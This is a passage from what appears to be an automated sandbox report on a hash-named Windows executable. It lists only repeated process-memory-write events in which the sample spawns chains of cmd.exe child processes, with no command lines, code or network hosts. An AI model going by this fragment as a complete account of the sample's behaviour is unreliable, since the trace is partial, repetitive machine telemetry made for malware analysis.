PID 1956 wrote to memory of 688 1956 cmd.exe 257 PID 1956 wrote to memory of 860 1956 cmd.exe 258 PID 1956 wrote to memory of 860 1956 cmd.exe 258 PID 1956 wrote to memory of 860 1956 cmd.exe 258 PID 1956 wrote to memory of 860 1956 cmd.exe 258 PID 1956 wrote to memory of 1824 1956 cmd.exe 259 PID 1956 wrote to memory of 1824 1956 cmd.exe 259 PID 1956 wrote to memory of 1824 1956 cmd.exe 259 PID 1956 wrote to memory of 1824 1956 cmd.exe 259 PID 1824 wrote to memory of 1776 1824 cmd.exe 260 PID 1824 wrote to memory of 1776 1824 cmd.exe 260 PID 1824 wrote to memory of 1776 1824 cmd.exe 260 PID 1824 wrote to memory of 1776 1824 cmd.exe 260 PID 1956 wrote to memory of 1168 1956 cmd.exe 261 PID 1956 wrote to memory of 1168 1956 cmd.exe 261 PID 1956 wrote to memory of 1168 1956 cmd.exe 261 PID 1956 wrote to memory of 1168 1956 cmd.exe 261 PID 616 wrote to memory of 1340 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 262 PID 616 wrote to memory of 1340 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 262 PID 616 wrote to memory of 1340 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 262 PID 616 wrote to memory of 1340 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 262 PID 1340 wrote to memory of 564 1340 cmd.exe 264 PID 1340 wrote to memory of 564 1340 cmd.exe 264 PID 1340 wrote to memory of 564 1340 cmd.exe 264 PID 1340 wrote to memory of 564 1340 cmd.exe 264 PID 1340 wrote to memory of 908 1340 cmd.exe 265 PID 1340 wrote to memory of 908 1340 cmd.exe 265 PID 1340 wrote to memory of 908 1340 cmd.exe 265 PID 1340 wrote to memory of 908 1340 cmd.exe 265 PID 1340 wrote to memory of 1584 1340 cmd.exe 266 PID 1340 wrote to memory of 1584 1340 cmd.exe 266 PID 1340 wrote to memory of 1584 1340 cmd.exe 266 PID 1340 wrote to memory of 1584 1340 cmd.exe 266 PID 1584 wrote to memory of 1460 1584 cmd.exe 267 PID 1584 wrote to memory of 1460 1584 cmd.exe 267 PID 1584 wrote to memory of 1460 1584 cmd.exe 267 PID 1584 wrote to memory of 1460 1584 cmd.exe 267 PID 1340 wrote to memory of 1212 1340 cmd.exe 268 PID 1340 wrote to memory of 1212 1340 cmd.exe 268 PID 1340 wrote to memory of 1212 1340 cmd.exe 268 PID 1340 wrote to memory of 1212 1340 cmd.exe 268 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 269 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 269 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 269 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 269 PID 1936 wrote to memory of 1020 1936 cmd.exe 271 PID 1936 wrote to memory of 1020 1936 cmd.exe 271 PID 1936 wrote to memory of 1020 1936 cmd.exe 271 PID 1936 wrote to memory of 1020 1936 cmd.exe 271 PID 1936 wrote to memory of 884 1936 cmd.exe 272 PID 1936 wrote to memory of 884 1936 cmd.exe 272 PID 1936 wrote to memory of 884 1936 cmd.exe 272 PID 1936 wrote to memory of 884 1936 cmd.exe 272 PID 1936 wrote to memory of 920 1936 cmd.exe 273 PID 1936 wrote to memory of 920 1936 cmd.exe 273 PID 1936 wrote to memory of 920 1936 cmd.exe 273 PID 1936 wrote to memory of 920 1936 cmd.exe 273 PID 920 wrote to memory of 1188 920 cmd.exe 274 PID 920 wrote to memory of 1188 920 cmd.exe 274 PID 920 wrote to memory of 1188 920 cmd.exe 274 PID 920 wrote to memory of 1188 920 cmd.exe 274 PID 1936 wrote to memory of 1492 1936 cmd.exe 275 PID 1936 wrote to memory of 1492 1936 cmd.exe 275 PID 1936 wrote to memory of 1492 1936 cmd.exe 275 PID 1936 wrote to memory of 1492 1936 cmd.exe 275 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 276 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 276 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 276 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 276 PID 548 wrote to memory of 1200 548 cmd.exe 278 PID 548 wrote to memory of 1200 548 cmd.exe 278 PID 548 wrote to memory of 1200 548 cmd.exe 278 PID 548 wrote to memory of 1200 548 cmd.exe 278 PID 548 wrote to memory of 1776 548 cmd.exe 279 PID 548 wrote to memory of 1776 548 cmd.exe 279 PID 548 wrote to memory of 1776 548 cmd.exe 279 PID 548 wrote to memory of 1776 548 cmd.exe 279 PID 548 wrote to memory of 1808 548 cmd.exe 280 PID 548 wrote to memory of 1808 548 cmd.exe 280 PID 548 wrote to memory of 1808 548 cmd.exe 280 PID 548 wrote to memory of 1808 548 cmd.exe 280 PID 1808 wrote to memory of 1168 1808 cmd.exe 281 PID 1808 wrote to memory of 1168 1808 cmd.exe 281 PID 1808 wrote to memory of 1168 1808 cmd.exe 281 PID 1808 wrote to memory of 1168 1808 cmd.exe 281 PID 548 wrote to memory of 680 548 cmd.exe 282 PID 548 wrote to memory of 680 548 cmd.exe 282 PID 548 wrote to memory of 680 548 cmd.exe 282 PID 548 wrote to memory of 680 548 cmd.exe 282 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 283 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 283 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 283 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 283 PID 1828 wrote to memory of 1176 1828 cmd.exe 285 PID 1828 wrote to memory of 1176 1828 cmd.exe 285 PID 1828 wrote to memory of 1176 1828 cmd.exe 285 PID 1828 wrote to memory of 1176 1828 cmd.exe 285 PID 1828 wrote to memory of 1796 1828 cmd.exe 286 PID 1828 wrote to memory of 1796 1828 cmd.exe 286 PID 1828 wrote to memory of 1796 1828 cmd.exe 286 PID 1828 wrote to memory of 1796 1828 cmd.exe 286 PID 1828 wrote to memory of 1680 1828 cmd.exe 287 PID 1828 wrote to memory of 1680 1828 cmd.exe 287 PID 1828 wrote to memory of 1680 1828 cmd.exe 287 PID 1828 wrote to memory of 1680 1828 cmd.exe 287 PID 1680 wrote to memory of 1212 1680 cmd.exe 288 PID 1680 wrote to memory of 1212 1680 cmd.exe 288 PID 1680 wrote to memory of 1212 1680 cmd.exe 288 PID 1680 wrote to memory of 1212 1680 cmd.exe 288 PID 1828 wrote to memory of 1340 1828 cmd.exe 289 PID 1828 wrote to memory of 1340 1828 cmd.exe 289 PID 1828 wrote to memory of 1340 1828 cmd.exe 289 PID 1828 wrote to memory of 1340 1828 cmd.exe 289 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 290 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 290 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 290 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 290 PID 1216 wrote to memory of 1468 1216 cmd.exe 292 PID 1216 wrote to memory of 1468 1216 cmd.exe 292 PID 1216 wrote to memory of 1468 1216 cmd.exe 292 PID 1216 wrote to memory of 1468 1216 cmd.exe 292 PID 1216 wrote to memory of 1136 1216 cmd.exe 293 PID 1216 wrote to memory of 1136 1216 cmd.exe 293 PID 1216 wrote to memory of 1136 1216 cmd.exe 293 PID 1216 wrote to memory of 1136 1216 cmd.exe 293 PID 1216 wrote to memory of 472 1216 cmd.exe 294 PID 1216 wrote to memory of 472 1216 cmd.exe 294 PID 1216 wrote to memory of 472 1216 cmd.exe 294 PID 1216 wrote to memory of 472 1216 cmd.exe 294 PID 472 wrote to memory of 1492 472 cmd.exe 295 PID 472 wrote to memory of 1492 472 cmd.exe 295 PID 472 wrote to memory of 1492 472 cmd.exe 295 PID 472 wrote to memory of 1492 472 cmd.exe 295 PID 1216 wrote to memory of 1120 1216 cmd.exe 296 PID 1216 wrote to memory of 1120 1216 cmd.exe 296 PID 1216 wrote to memory of 1120 1216 cmd.exe 296 PID 1216 wrote to memory of 1120 1216 cmd.exe 296 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 297 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 297 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 297 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 297 PID 232 wrote to memory of 1956 232 cmd.exe 299 PID 232 wrote to memory of 1956 232 cmd.exe 299 PID 232 wrote to memory of 1956 232 cmd.exe 299 PID 232 wrote to memory of 1956 232 cmd.exe 299 PID 232 wrote to memory of 1784 232 cmd.exe 300 PID 232 wrote to memory of 1784 232 cmd.exe 300 PID 232 wrote to memory of 1784 232 cmd.exe 300 PID 232 wrote to memory of 1784 232 cmd.exe 300 PID 232 wrote to memory of 1488 232 cmd.exe 301 PID 232 wrote to memory of 1488 232 cmd.exe 301 PID 232 wrote to memory of 1488 232 cmd.exe 301 PID 232 wrote to memory of 1488 232 cmd.exe 301 PID 1488 wrote to memory of 680 1488 cmd.exe 302 PID 1488 wrote to memory of 680 1488 cmd.exe 302 PID 1488 wrote to memory of 680 1488 cmd.exe 302 PID 1488 wrote to memory of 680 1488 cmd.exe 302 PID 232 wrote to memory of 2032 232 cmd.exe 303 PID 232 wrote to memory of 2032 232 cmd.exe 303 PID 232 wrote to memory of 2032 232 cmd.exe 303 PID 232 wrote to memory of 2032 232 cmd.exe 303 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 304 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 304 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 304 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 304 PID 1176 wrote to memory of 360 1176 cmd.exe 306 PID 1176 wrote to memory of 360 1176 cmd.exe 306 PID 1176 wrote to memory of 360 1176 cmd.exe 306 PID 1176 wrote to memory of 360 1176 cmd.exe 306 PID 1176 wrote to memory of 528 1176 cmd.exe 307 PID 1176 wrote to memory of 528 1176 cmd.exe 307 PID 1176 wrote to memory of 528 1176 cmd.exe 307 PID 1176 wrote to memory of 528 1176 cmd.exe 307 PID 1176 wrote to memory of 1152 1176 cmd.exe 308 PID 1176 wrote to memory of 1152 1176 cmd.exe 308 PID 1176 wrote to memory of 1152 1176 cmd.exe 308 PID 1176 wrote to memory of 1152 1176 cmd.exe 308 PID 1152 wrote to memory of 1340 1152 cmd.exe 309 PID 1152 wrote to memory of 1340 1152 cmd.exe 309 PID 1152 wrote to memory of 1340 1152 cmd.exe 309 PID 1152 wrote to memory of 1340 1152 cmd.exe 309 PID 1176 wrote to memory of 1516 1176 cmd.exe 310 PID 1176 wrote to memory of 1516 1176 cmd.exe 310 PID 1176 wrote to memory of 1516 1176 cmd.exe 310 PID 1176 wrote to memory of 1516 1176 cmd.exe 310 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 311 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 311 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 311 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 311 PID 1948 wrote to memory of 224 1948 cmd.exe 313 PID 1948 wrote to memory of 224 1948 cmd.exe 313 PID 1948 wrote to memory of 224 1948 cmd.exe 313 PID 1948 wrote to memory of 224 1948 cmd.exe 313 PID 1948 wrote to memory of 1472 1948 cmd.exe 314 PID 1948 wrote to memory of 1472 1948 cmd.exe 314 PID 1948 wrote to memory of 1472 1948 cmd.exe 314 PID 1948 wrote to memory of 1472 1948 cmd.exe 314 PID 1948 wrote to memory of 1980 1948 cmd.exe 315 PID 1948 wrote to memory of 1980 1948 cmd.exe 315 PID 1948 wrote to memory of 1980 1948 cmd.exe 315 PID 1948 wrote to memory of 1980 1948 cmd.exe 315 PID 1980 wrote to memory of 1868 1980 cmd.exe 316 PID 1980 wrote to memory of 1868 1980 cmd.exe 316 PID 1980 wrote to memory of 1868 1980 cmd.exe 316 PID 1980 wrote to memory of 1868 1980 cmd.exe 316 PID 1948 wrote to memory of 1112 1948 cmd.exe 317 PID 1948 wrote to memory of 1112 1948 cmd.exe 317 PID 1948 wrote to memory of 1112 1948 cmd.exe 317 PID 1948 wrote to memory of 1112 1948 cmd.exe 317 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 318 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 318 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 318 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 318 PID 1956 wrote to memory of 228 1956 cmd.exe 320 PID 1956 wrote to memory of 228 1956 cmd.exe 320 PID 1956 wrote to memory of 228 1956 cmd.exe 320 PID 1956 wrote to memory of 228 1956 cmd.exe 320 PID 1956 wrote to memory of 1488 1956 cmd.exe 321 PID 1956 wrote to memory of 1488 1956 cmd.exe 321 PID 1956 wrote to memory of 1488 1956 cmd.exe 321 PID 1956 wrote to memory of 1488 1956 cmd.exe 321 PID 1956 wrote to memory of 1460 1956 cmd.exe 322 PID 1956 wrote to memory of 1460 1956 cmd.exe 322 PID 1956 wrote to memory of 1460 1956 cmd.exe 322 PID 1956 wrote to memory of 1460 1956 cmd.exe 322 PID 1460 wrote to memory of 1996 1460 cmd.exe 323 PID 1460 wrote to memory of 1996 1460 cmd.exe 323 PID 1460 wrote to memory of 1996 1460 cmd.exe 323 PID 1460 wrote to memory of 1996 1460 cmd.exe 323 PID 1956 wrote to memory of 220 1956 cmd.exe 324 PID 1956 wrote to memory of 220 1956 cmd.exe 324 PID 1956 wrote to memory of 220 1956 cmd.exe 324 PID 1956 wrote to memory of 220 1956 cmd.exe 324 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 325 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 325 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 325 PID 616 wrote to memory of 360 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 325 PID 360 wrote to memory of 952 360 cmd.exe 327 PID 360 wrote to memory of 952 360 cmd.exe 327 PID 360 wrote to memory of 952 360 cmd.exe 327 PID 360 wrote to memory of 952 360 cmd.exe 327 PID 360 wrote to memory of 1152 360 cmd.exe 328 PID 360 wrote to memory of 1152 360 cmd.exe 328 PID 360 wrote to memory of 1152 360 cmd.exe 328 PID 360 wrote to memory of 1152 360 cmd.exe 328 PID 360 wrote to memory of 1516 360 cmd.exe 329 PID 360 wrote to memory of 1516 360 cmd.exe 329 PID 360 wrote to memory of 1516 360 cmd.exe 329 PID 360 wrote to memory of 1516 360 cmd.exe 329 PID 1516 wrote to memory of 1176 1516 cmd.exe 330 PID 1516 wrote to memory of 1176 1516 cmd.exe 330 PID 1516 wrote to memory of 1176 1516 cmd.exe 330 PID 1516 wrote to memory of 1176 1516 cmd.exe 330 PID 360 wrote to memory of 1136 360 cmd.exe 331 PID 360 wrote to memory of 1136 360 cmd.exe 331 PID 360 wrote to memory of 1136 360 cmd.exe 331 PID 360 wrote to memory of 1136 360 cmd.exe 331 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 332 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 332 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 332 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 332 PID 1844 wrote to memory of 624 1844 cmd.exe 334 PID 1844 wrote to memory of 624 1844 cmd.exe 334 PID 1844 wrote to memory of 624 1844 cmd.exe 334 PID 1844 wrote to memory of 624 1844 cmd.exe 334 PID 1844 wrote to memory of 1980 1844 cmd.exe 335 PID 1844 wrote to memory of 1980 1844 cmd.exe 335 PID 1844 wrote to memory of 1980 1844 cmd.exe 335 PID 1844 wrote to memory of 1980 1844 cmd.exe 335 PID 1844 wrote to memory of 1228 1844 cmd.exe 336 PID 1844 wrote to memory of 1228 1844 cmd.exe 336 PID 1844 wrote to memory of 1228 1844 cmd.exe 336 PID 1844 wrote to memory of 1228 1844 cmd.exe 336 PID 1228 wrote to memory of 1936 1228 cmd.exe 337 PID 1228 wrote to memory of 1936 1228 cmd.exe 337 PID 1228 wrote to memory of 1936 1228 cmd.exe 337 PID 1228 wrote to memory of 1936 1228 cmd.exe 337 PID 1844 wrote to memory of 1808 1844 cmd.exe 338 PID 1844 wrote to memory of 1808 1844 cmd.exe 338 PID 1844 wrote to memory of 1808 1844 cmd.exe 338 PID 1844 wrote to memory of 1808 1844 cmd.exe 338 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 339 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 339 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 339 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 339 PID 228 wrote to memory of 1824 228 cmd.exe 341 PID 228 wrote to memory of 1824 228 cmd.exe 341 PID 228 wrote to memory of 1824 228 cmd.exe 341 PID 228 wrote to memory of 1824 228 cmd.exe 341 PID 228 wrote to memory of 1460 228 cmd.exe 342 PID 228 wrote to memory of 1460 228 cmd.exe 342 PID 228 wrote to memory of 1460 228 cmd.exe 342 PID 228 wrote to memory of 1460 228 cmd.exe 342 PID 228 wrote to memory of 796 228 cmd.exe 343 PID 228 wrote to memory of 796 228 cmd.exe 343 PID 228 wrote to memory of 796 228 cmd.exe 343 PID 228 wrote to memory of 796 228 cmd.exe 343 PID 796 wrote to memory of 1332 796 cmd.exe 344 PID 796 wrote to memory of 1332 796 cmd.exe 344 PID 796 wrote to memory of 1332 796 cmd.exe 344 PID 796 wrote to memory of 1332 796 cmd.exe 344 PID 228 wrote to memory of 1680 228 cmd.exe 345 PID 228 wrote to memory of 1680 228 cmd.exe 345 PID 228 wrote to memory of 1680 228 cmd.exe 345 PID 228 wrote to memory of 1680 228 cmd.exe 345 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 346 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 346 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 346 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 346 PID 952 wrote to memory of 1584 952 cmd.exe 348 PID 952 wrote to memory of 1584 952 cmd.exe 348 PID 952 wrote to memory of 1584 952 cmd.exe 348 PID 952 wrote to memory of 1584 952 cmd.exe 348 PID 952 wrote to memory of 1516 952 cmd.exe 349 PID 952 wrote to memory of 1516 952 cmd.exe 349 PID 952 wrote to memory of 1516 952 cmd.exe 349 PID 952 wrote to memory of 1516 952 cmd.exe 349 PID 952 wrote to memory of 224 952 cmd.exe 350 PID 952 wrote to memory of 224 952 cmd.exe 350 PID 952 wrote to memory of 224 952 cmd.exe 350 PID 952 wrote to memory of 224 952 cmd.exe 350 PID 224 wrote to memory of 1828 224 cmd.exe 351 PID 224 wrote to memory of 1828 224 cmd.exe 351 PID 224 wrote to memory of 1828 224 cmd.exe 351 PID 224 wrote to memory of 1828 224 cmd.exe 351 PID 952 wrote to memory of 472 952 cmd.exe 352 PID 952 wrote to memory of 472 952 cmd.exe 352 PID 952 wrote to memory of 472 952 cmd.exe 352 PID 952 wrote to memory of 472 952 cmd.exe 352 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 353 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 353 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 353 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 353 PID 624 wrote to memory of 920 624 cmd.exe 355 PID 624 wrote to memory of 920 624 cmd.exe 355 PID 624 wrote to memory of 920 624 cmd.exe 355 PID 624 wrote to memory of 920 624 cmd.exe 355 PID 624 wrote to memory of 1228 624 cmd.exe 356 PID 624 wrote to memory of 1228 624 cmd.exe 356 PID 624 wrote to memory of 1228 624 cmd.exe 356 PID 624 wrote to memory of 1228 624 cmd.exe 356 PID 624 wrote to memory of 1076 624 cmd.exe 357 PID 624 wrote to memory of 1076 624 cmd.exe 357 PID 624 wrote to memory of 1076 624 cmd.exe 357 PID 624 wrote to memory of 1076 624 cmd.exe 357 PID 1076 wrote to memory of 860 1076 cmd.exe 358 PID 1076 wrote to memory of 860 1076 cmd.exe 358 PID 1076 wrote to memory of 860 1076 cmd.exe 358 PID 1076 wrote to memory of 860 1076 cmd.exe 358 PID 624 wrote to memory of 2032 624 cmd.exe 359 PID 624 wrote to memory of 2032 624 cmd.exe 359 PID 624 wrote to memory of 2032 624 cmd.exe 359 PID 624 wrote to memory of 2032 624 cmd.exe 359 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 360 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 360 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 360 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 360 PID 888 wrote to memory of 1332 888 cmd.exe 362 PID 888 wrote to memory of 1332 888 cmd.exe 362 PID 888 wrote to memory of 1332 888 cmd.exe 362 PID 888 wrote to memory of 1332 888 cmd.exe 362 PID 888 wrote to memory of 1960 888 cmd.exe 363 PID 888 wrote to memory of 1960 888 cmd.exe 363 PID 888 wrote to memory of 1960 888 cmd.exe 363 PID 888 wrote to memory of 1960 888 cmd.exe 363 PID 888 wrote to memory of 1680 888 cmd.exe 364 PID 888 wrote to memory of 1680 888 cmd.exe 364 PID 888 wrote to memory of 1680 888 cmd.exe 364 PID 888 wrote to memory of 1680 888 cmd.exe 364 PID 1680 wrote to memory of 228 1680 cmd.exe 365 PID 1680 wrote to memory of 228 1680 cmd.exe 365 PID 1680 wrote to memory of 228 1680 cmd.exe 365 PID 1680 wrote to memory of 228 1680 cmd.exe 365 PID 888 wrote to memory of 1176 888 cmd.exe 366 PID 888 wrote to memory of 1176 888 cmd.exe 366 PID 888 wrote to memory of 1176 888 cmd.exe 366 PID 888 wrote to memory of 1176 888 cmd.exe 366 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 367 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 367 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 367 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 367 PID 1492 wrote to memory of 1432 1492 cmd.exe 369 PID 1492 wrote to memory of 1432 1492 cmd.exe 369 PID 1492 wrote to memory of 1432 1492 cmd.exe 369 PID 1492 wrote to memory of 1432 1492 cmd.exe 369 PID 1492 wrote to memory of 1020 1492 cmd.exe 370 PID 1492 wrote to memory of 1020 1492 cmd.exe 370 PID 1492 wrote to memory of 1020 1492 cmd.exe 370 PID 1492 wrote to memory of 1020 1492 cmd.exe 370 PID 1492 wrote to memory of 1556 1492 cmd.exe 371 PID 1492 wrote to memory of 1556 1492 cmd.exe 371 PID 1492 wrote to memory of 1556 1492 cmd.exe 371 PID 1492 wrote to memory of 1556 1492 cmd.exe 371 PID 1556 wrote to memory of 1256 1556 cmd.exe 372 PID 1556 wrote to memory of 1256 1556 cmd.exe 372 PID 1556 wrote to memory of 1256 1556 cmd.exe 372 PID 1556 wrote to memory of 1256 1556 cmd.exe 372 PID 1492 wrote to memory of 1112 1492 cmd.exe 373 PID 1492 wrote to memory of 1112 1492 cmd.exe 373 PID 1492 wrote to memory of 1112 1492 cmd.exe 373 PID 1492 wrote to memory of 1112 1492 cmd.exe 373 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 374 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 374 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 374 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 374 PID 680 wrote to memory of 1844 680 cmd.exe 376 PID 680 wrote to memory of 1844 680 cmd.exe 376 PID 680 wrote to memory of 1844 680 cmd.exe 376 PID 680 wrote to memory of 1844 680 cmd.exe 376 PID 680 wrote to memory of 1076 680 cmd.exe 377 PID 680 wrote to memory of 1076 680 cmd.exe 377 PID 680 wrote to memory of 1076 680 cmd.exe 377 PID 680 wrote to memory of 1076 680 cmd.exe 377 PID 680 wrote to memory of 1824 680 cmd.exe 378 PID 680 wrote to memory of 1824 680 cmd.exe 378 PID 680 wrote to memory of 1824 680 cmd.exe 378 PID 680 wrote to memory of 1824 680 cmd.exe 378 PID 1824 wrote to memory of 1408 1824 cmd.exe 379 PID 1824 wrote to memory of 1408 1824 cmd.exe 379 PID 1824 wrote to memory of 1408 1824 cmd.exe 379 PID 1824 wrote to memory of 1408 1824 cmd.exe 379 PID 680 wrote to memory of 1460 680 cmd.exe 380 PID 680 wrote to memory of 1460 680 cmd.exe 380 PID 680 wrote to memory of 1460 680 cmd.exe 380 PID 680 wrote to memory of 1460 680 cmd.exe 380 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 381 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 381 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 381 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 381 PID 1332 wrote to memory of 436 1332 cmd.exe 383 PID 1332 wrote to memory of 436 1332 cmd.exe 383 PID 1332 wrote to memory of 436 1332 cmd.exe 383 